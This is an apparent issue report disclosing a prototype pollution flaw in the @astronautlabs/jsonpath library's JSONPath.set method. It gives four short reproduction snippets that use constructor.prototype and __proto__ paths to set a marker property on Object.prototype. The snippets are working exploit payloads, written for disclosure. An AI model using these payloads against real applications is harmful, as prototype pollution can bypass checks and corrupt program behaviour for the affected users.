Prototype Pollution Vulnerability in @astronautlabs/jsonpath JSONPath.set Method #83
Description
🐛 Bug Report
Have you spent some time to check if this issue has been raised before?
[✅] I have read googled for a similar issue or checked our older issues for a similar bug
Have you read the Code of Conduct?
[ ✅] I have read the Code of Conduct
To Reproduce
Step 1: Install Dependencies
npm install @astronautlabs/jsonpathStep 2: Vulnerability Reproduction Code (Take TP0001 as an example)
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
// Initially clean Object.prototype
console.log('Before pollution:', Object.prototype.polluted); // Output: undefined
// Construct prototype pollution payload
const targetObj = {};
JSONPath.set(targetObj, '$.constructor.prototype.polluted', 'pwned');
// Verify prototype pollution
console.log('After pollution:', Object.prototype.polluted); // Output: pwnedStep 3: Reproduce Other Variant Scenarios
Scenario 2 (TP0003: proto path)
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
const targetObj = {};
JSONPath.set(targetObj, "$['__proto__']['polluted']", 'pwned');
console.log(Object.prototype.polluted); // Output: pwnedScenario 3 (TP0007: constructor.prototype path without root prefix)
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
JSONPath.set({}, 'constructor.prototype.polluted', true);
console.log(Object.prototype.polluted); // Output: trueScenario 4 (TP0008: Array-form path)
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
JSONPath.set({}, ['constructor', 'prototype', 'polluted'], true);
console.log(Object.prototype.polluted); // Output: trueExpected behavior
Actual Behavior
(Write what happened. Add screenshots, if applicable.)
Your Environment
Library Version: @astronautlabs/jsonpath
Operating System: Ubuntu 22.04
Node.js Version: v16.20.0 / v18.17.1 / v20.9.0
Runtime Environment: Node.js native environment